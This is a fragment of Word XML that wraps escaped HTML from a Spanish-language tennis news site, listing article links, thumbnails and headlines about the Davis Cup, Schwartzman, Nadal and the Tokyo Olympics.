      </w:r>
    </w:p>
    <w:p w14:paraId="089019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&gt; &lt; a href = "#mvp-feat-tab-col2" &gt; &lt; span class = "mvp-feat1-list-but" &gt; Videos &lt; /span&gt;&lt;/a &gt; &lt; /li&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B37BC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/ul&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4458A1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/div&gt;&lt;!--mvp-feat1-list-head-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1749C1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"mvp-feat-tab-col1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039C4C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"mvp-feat1-list left relative mvp-tab-col-cont" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2C0C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AE643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"http://todosobretenis.com/dura-derrota-de-schwartzman-y-contundente-victoria-de-pella-ante-bielorrusia/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA59C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02721F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F4005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06225B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F10B3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6EC218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74217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2D9720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9CAC9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138FE36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1213743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"http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5DD8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1E5763A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9978F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"http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-150x150.jpeg 150w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-300x300.jpeg 300w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-768x768.jpeg 768w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-1024x1024.jpeg 1024w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft.jpeg 1080w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6658EB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7C3E24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76FA91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5BCB4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335300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25862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63B4F0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F8D38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57C901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53BA9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CDF54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Dura derrota de Schwartzman y contundente victoria de Pella ante Bielorrusia &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB78C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72A18A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3A3F14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2107192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285D2E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19C757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"http://todosobretenis.com/schwartzman-estaba-en-un-dia-en-el-que-nada-iba-a-salir/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F63AEA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7E30B6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DCCB7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219C11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B6AEC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4FF36F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90218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706DB2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B7333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4D9835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635278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"http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF1A5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6A6C7B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5ED8AD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"http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398D3C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7A66CB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549511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5BCA8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61912D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98768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7AB1F4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7EAB18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21A9D9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C0E5E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1E3D3E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Schwartzman: &amp; #8220;&amp;# 8221;Estaba en un dÃ­ a en el que nada iba a salir &amp; #8221;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9759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&lt;/div&gt;&lt;!--mvp-feat1-list-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F85D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&lt;/div&gt;&lt;!--mvp-feat1-list-in--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FF2F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&lt;/div&gt;&lt;!--mvp-feat1-list-out--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D6AE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&lt;/div&gt;&lt;!--mvp-feat1-list-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E35E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&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9C74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&lt;a href= "http://todosobretenis.com/argentina-vs-bielorrusia-marcaria-la-despedida-de-gaston-gaudio/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762DAF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1BB8E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350B8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6AB2EF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DACDD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1BCC94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263A3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137A99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15905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img width = "80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3505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201FC4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"http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB30E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594AF9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C5B44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"http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4451DE5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13CA76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593506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2456A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1C10D3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C7E8D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DFF46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548DD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4772F7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099D2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83461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Argentina vs Bielorrusia marcarÃ­ a la despedida de GastÃ³ n Gaudio &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8E96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251FE7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53F119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63787D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2074A7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65D90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"http://todosobretenis.com/el-camino-de-argentina-a-las-finales-de-madrid-2022/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6DB3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19A52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86DCF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57C158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F72CA1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61C0DD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F0719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0E7ADF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AD1D7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7F57AF5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61EDAF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"http://todosobretenis.com/wp-content/uploads/2020/03/ESWxn4wXYAA9TEf-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766A5C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697B24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34424A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"http://todosobretenis.com/wp-content/uploads/2020/03/ESWxn4wXYAA9TEf-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/ESWxn4wXYAA9TEf-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3B0D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6A757E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388661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66345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796196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FD008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5AEA97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4B9D6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185A91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5939A7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A9AF59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El camino de Argentina a las finales de Madrid 2022 &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CD95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4AEA47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18B55A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005EB0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4BA524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1973E1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"http://todosobretenis.com/schwartzman-abrira-la-serie-ante-bielorrusia/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8C0F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145F70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42352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5A15CD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168CAC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7C3851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789EC8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2144200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D8CB7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2A5D34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54C1B6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"http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26752A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77FA4B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582CB1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"http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459F5C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0DB89C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7E6962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05F4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7B76F0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CF7DD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6C0941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A3345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5BF23A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6C86C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01FEEF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Schwartzman abrirÃ¡ la serie de Copa Davis ante Bielorrusia &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2413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7F1814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59C769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522582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041994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645EF7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"http://todosobretenis.com/un-total-de-10-paises-buscan-la-clasificacion-a-los-qualifiers-de-la-copa-davis/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4AD4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3B9BB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75733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474FB6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81BE8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41A946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611BE1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41B779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6BF5C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663A8D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6F44E5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"http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4133E0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7E2906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06ED6F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"http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE982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62377D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05C798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533487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div class = "mvp-feat1-list-text" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6FB3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7425C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47EDD0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9535E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Copa Davis &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D8E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6354B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058EAF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Un total de 10 paÃ­ ses buscan la clasificaciÃ³ n a los Qualifiers de la Copa Davis &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF6AFD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0BC531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2717965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4EEEC5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3910D1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554ACB5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"http://todosobretenis.com/un-siglo-de-tenis-la-aat-cumple-100-anos-y-lo-celebra-junto-a-los-clubes/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167FC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7D3DA6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125F7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68992A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6FCD8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3D1C0E8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8668E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116E66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351F7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0A893EF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4E410B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"http://todosobretenis.com/wp-content/uploads/2021/09/rc_2457-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306CC1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573FBC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3350F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"http://todosobretenis.com/wp-content/uploads/2021/09/rc_2457-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/rc_2457-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AC5A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20160CD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08F6AC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A43BC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13A388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3AC85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0C981C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2860F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Noticias &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0DA64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2B0A0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CFDA2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Un siglo de tenis: la AAT cumple 100 aÃ± os y lo celebra junto a los clubes &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595120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/div&gt;&lt;!--mvp-feat1-list-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185810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/div&gt;&lt;!--mvp-feat1-list-in--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0573A9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/div&gt;&lt;!--mvp-feat1-list-out--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414646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/div&gt;&lt;!--mvp-feat1-list-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFD81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/a&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B64EF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a href = "http://todosobretenis.com/harris-obtiene-la-mejor-victoria-de-su-carrera/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B25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FE96F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95B9B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6A6ED18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869C21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4C4721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FCBDA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2A986D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49EABA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462D0A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48EF23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"http://todosobretenis.com/wp-content/uploads/2021/08/harris-washington-2021-thursday-2-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1931AE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22081A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C002F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"http://todosobretenis.com/wp-content/uploads/2021/08/harris-washington-2021-thursday-2-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/08/harris-washington-2021-thursday-2-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2963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34D2C1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1461F7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D59C5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47F8C3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D753B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0566189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8CB2B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ATP 500 &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65437B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8E562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2F0297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Harris obtiene el mejor triunfo de su carrera &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127303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615E41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78059B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0A3729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012D6F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472D5E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"http://todosobretenis.com/victoria-sufrida-de-nadal-en-su-vuelta-a-la-actividad/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327DF4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250E98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C0135B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1577A62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A2DB7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36E1BB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CEB38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36DF37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53E9C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2A3C2E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61D152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"http://todosobretenis.com/wp-content/uploads/2021/08/E7_OHOaUcAApC84-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366141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4C0AA39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F328C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"http://todosobretenis.com/wp-content/uploads/2021/08/E7_OHOaUcAApC84-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/08/E7_OHOaUcAApC84-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61574A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6CD9CD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7AA240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D99C4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4F0EDE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878EA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1CCBC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67ADB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ATP 500 &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723EC4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D1189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4C38C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Victoria sufrida de Nadal en su vuelta a la actividad &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC1B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1EB18D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1C99F0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58AB4D9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/div&gt;&lt;!--mvp-feat1-list-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECC68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42D018B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"http://todosobretenis.com/nadal-retorna-al-circuito-frente-a-jack-sock/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4451C2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0F8D8F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4CD2F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0EAA94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11C5D7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783A468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EB111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1A00B35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7ED6D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5A9CC6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4B6E4E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"http://todosobretenis.com/wp-content/uploads/2021/08/r890374_1024x576_16-9-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CA63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2C5730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7FF22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"http://todosobretenis.com/wp-content/uploads/2021/08/r890374_1024x576_16-9-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/08/r890374_1024x576_16-9-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D91C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011F61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2BFADF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25D8F3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6A4BBD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6A4820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01DCA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1DBFC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ATP 500 &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F74AC2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9FD22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1F20285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Nadal retorna al circuito frente a Jack Sock &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB773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2BCE726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2A081D8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1460C5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5F7C8E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48798B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"http://todosobretenis.com/zverev-campeon-olimpico/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E626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0D6BFA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27384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24B714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EA50E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3D20BD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00F1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3B4D6A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3F0690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58FA93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1FEC15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"http://todosobretenis.com/wp-content/uploads/2021/08/E7sqb8wX0AIgeTm-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1258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3DE1B3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6C070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"http://todosobretenis.com/wp-content/uploads/2021/08/E7sqb8wX0AIgeTm-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/08/E7sqb8wX0AIgeTm-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA209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3647DC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7DEA53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18606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2DB7CA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EEE4B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6CE08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93373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JJOO &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E726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FAF710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188FB8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Â¡ Zverev campeÃ³ n olÃ­ mpico! &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9CCE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06A3A3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4EB45C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784EA9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7CCC09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A9733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"http://todosobretenis.com/carreno-busta-se-quedo-con-la-medalla-de-bronce/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558D4E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28F890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2C5E2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5C8FF9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A6D61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7140F1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38A96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56B30A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DACE7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5D3778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341E29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"http://todosobretenis.com/wp-content/uploads/2021/08/E7nQpB8XMAkm2Kk-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043159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743A5E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E564A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"http://todosobretenis.com/wp-content/uploads/2021/08/E7nQpB8XMAkm2Kk-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/08/E7nQpB8XMAkm2Kk-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6E77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5BDABF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71EEF39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704DC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1090B3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A32CE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A315B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28F7A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JJOO &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155905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324F4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0BB69F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CarreÃ± o Busta se quedÃ³ con la medalla de bronce &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7819B7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0D902E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6F533C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673D7B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3CBA2D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4D7596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"http://todosobretenis.com/djokovic-se-despidio-del-oro-e-ira-por-el-bronce-en-tokio/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33173B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D5031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899E1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327515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0C7B3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182C35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3147D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741E71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&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEDC2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124520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010099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"http://todosobretenis.com/wp-content/uploads/2021/07/95l4NVMq-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE36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4970BA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04A362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"http://todosobretenis.com/wp-content/uploads/2021/07/95l4NVMq-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/07/95l4NVMq-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0C33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6E2839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1823D4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19320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74539D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6BFDC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49854D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9E9E3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JJOO &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCDA3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7F7D9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3A5038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Djokovic se despidiÃ³ del oro e irÃ¡ por el bronce en Tokio &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329CE4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47EC68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537D51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09A2B0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415578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070C96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/div&gt;&lt;!--mvp-feat-tab-col1--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FB6E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"mvp-feat-tab-col2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C5B1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"mvp-feat1-list left relative mvp-tab-col-cont" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3307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FAE8A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"http://todosobretenis.com/revivi-la-consagracion-de-londero-en-cordoba/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FB73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A7F48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00233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4F8E21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AA8EE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5DC4BA7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F3223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2187B4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E1C8B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5814D0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319D5D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"http://todosobretenis.com/wp-content/uploads/2019/02/topo-1-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D210E7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7835EF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84091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"http://todosobretenis.com/wp-content/uploads/2019/02/topo-1-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2019/02/topo-1-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C05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7E1BD7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0D2136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E28CC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0E4B1C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2A0C4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CA2228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31286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Cordoba &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B737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7CD89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32880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Revivi la consagraciÃ³ n de Londero en Cordoba &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DB69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337856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2AA09CE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6EAF52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5701E4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7E9865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"http://todosobretenis.com/delpo-a-puertas-abiertas-en-tandil/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3777F85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07EF1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0FA27A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47D0E2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38499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00FAEA7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50154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0F0671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54001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037681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745969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"http://todosobretenis.com/wp-content/uploads/2019/02/hoy-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25201D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5C2456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91D37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"http://todosobretenis.com/wp-content/uploads/2019/02/hoy-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2019/02/hoy-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DFA8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4F4064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7468F7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9E045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2BDFE7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7C03D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350C5B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62930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Y algo mÃ¡ s &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652B88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22BB3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71899B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Delpo a puertas abiertas en Tandil &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471905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25EE9F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4E57301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01DC17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738437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25EE2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"http://todosobretenis.com/highlight-novak-djokovic-vs-rafael-nadal/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1A12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6C3D13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E21F5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77CDA4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719AA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1EAA3A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38D9D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6AD4E6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49C8E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05168CD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4D2531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"http://todosobretenis.com/wp-content/uploads/2019/01/novak-1-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FA13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62BA3A3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D57E4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"http://todosobretenis.com/wp-content/uploads/2019/01/novak-1-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2019/01/novak-1-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE926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3E7539C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3236A15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&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D8983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345366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E9E2F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58504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B07A8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Australian Open &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCDC9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4A808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D66F9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Highlight: Novak Djokovic vs Rafael Nadal &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2288A4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/div&gt;&lt;!--mvp-feat1-list-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F253D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/div&gt;&lt;!--mvp-feat1-list-in--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BFE7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/div&gt;&lt;!--mvp-feat1-list-out--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1731CA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/div&gt;&lt;!--mvp-feat1-list-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3A90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/a&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD482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a href = "http://todosobretenis.com/ladob-la-villa-olimpica-la-juventud/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB03FC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08B82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30D93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4AE239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3BA37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7A01ED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6EEE7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06304D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622EDA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0504F1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29B255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99390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6D09AA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6D6F73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FD67E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2C965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Juegos OlÃ­ mpicos de la Juventud &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033704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0B1E6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73D915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El #LadoB de la Villa Olimpica de la Juventud &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0C66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78D1DD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261C4B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269A55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09D136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A1927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"http://todosobretenis.com/la-celebracion-delpo-vestuario/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721CBF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3FAEB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C3678B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30C2B8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91EE9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71F115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8CF60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56BB6B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F139F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5EE6C92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56BFA7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197F3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0D6629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35415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6BD094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BE90E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Indian Wells &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E7E8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9C55C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36B39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La celebraciÃ³ n de Delpo en el vestuario &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239048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7134D9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137D42F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477E8B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5CACD1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6CF2B00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"http://todosobretenis.com/papelon-del-alcalde-quito-ecuador-open/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3557F2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0A03EE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3E22A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268917F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468EC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7851ED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A0F92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426589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C54FB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7347EB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292AE3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D7260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57F3BC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CA439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033336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EC209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Quito &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EA10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29A3C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202B5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El papelÃ³ n del alcalde de Quito en el Ecuador Open &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFDC4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4E65E15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3581B8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4C8038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6DF601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11A1E9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"http://todosobretenis.com/punto-la-victoria/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7656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5E4A18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F161E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4E952A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B8918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657AC0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14AE7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21A7C1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BC688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4A79BC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3B4E64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97992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580734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76453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4EE716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2562B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Australian Open &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED462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&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DE5B5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162D3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El punto de la victoria &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2755C6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20B1D3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611153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70CBD1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561DED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552495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"http://todosobretenis.com/los-1000-de-roger/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778598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B3BCD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053B9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4703E0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AD89C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62F3AB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9128F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1815D6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8C6DE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204396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5BF1FE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DB2BA5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7CA413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D8317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6934EB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E2AAB9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Multimedia &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360687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39AF8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B2BFF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Los 1000 de RogerÂ &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420690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10F0B0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7CAD114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167C95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448BBE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401A02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"http://todosobretenis.com/el-punto-que-hizo-historia/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D872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4AA53A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FC514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06AAEA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5E122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08EAE5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670AF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1C0632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4BAED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0238D38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5916D1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B5EF4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64C6AC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4E713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FF106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C87F6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Multimedia &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070FE3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7989C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04B3925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El punto que hizo historia &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78013B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624B73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039F85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19CCEC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659F73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117000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"http://todosobretenis.com/que-hizo-federer-antes-de-jugar-las-semis-de-wimbledon/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A68E9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05C28A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34CAD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7FB792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0881B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40A69E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3190D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031E0C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2D4F8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2F609B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2827AD2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52AED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2AE1D3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47F45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1A8DC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62E34D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Multimedia &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AD46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363C6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05B91A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Â¿ Que hizo Federer antes de jugar las semis de Wimbledon ? &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293E7D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5D5720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7294B5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4E0C42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475500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230FD4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"http://todosobretenis.com/djokovic-y-agassi-entrenan-juntos-por-primera-vez/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314C19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4F79D6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03537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64A89B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364C2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3B93C9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F934B3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40B834C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5CD5C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626592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6DC53C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2BFD0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53AEAE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F69EC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4DB5D3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38BE9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Multimedia &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398593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484A7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002416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Djokovic y Agassi entrenan juntos por primera vez &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03864E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5270F2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52089A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2F184F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/div&gt;&lt;!--mvp-feat1-list-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AE41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021C7C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"http://todosobretenis.com/23051-2/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D48A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09D763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705F0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29F593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D2FC57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3CB844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42C62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35CD5A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222DC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2E8401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193637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FF6C3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48A5A2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5585E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7A397E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AB58A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Multimedia &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719200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92038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341F53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Los vestuarios del Masters 1000 de Madrid por dentro &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C2F3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420213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64ACA9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4EF161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1D4414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57CEB6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"http://todosobretenis.com/zeballos-luego-de-perder-le-pidio-una-selfie-a-nadal/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304820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A1E5C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9D3E9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31B46D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1DA34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5B2B39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44EE7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022619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AA9EF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/div&gt;&lt;!--mvp-feat1-list-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344921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749858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37DA7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568A67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6AF06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539B71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D675F0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Marketing &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B5D4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7A16D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16F650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Zeballos luego de perder le pidiÃ³ una selfie a Nadal &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02823C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594720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18BBB3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73D3E6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233A1E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07C18E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/div&gt;&lt;!--mvp-feat-tab-col2--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27929E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"mvp-feat-tab-col3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED8B6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"mvp-feat1-list left relative mvp-tab-col-cont" &gt;</w:t>
      </w:r>
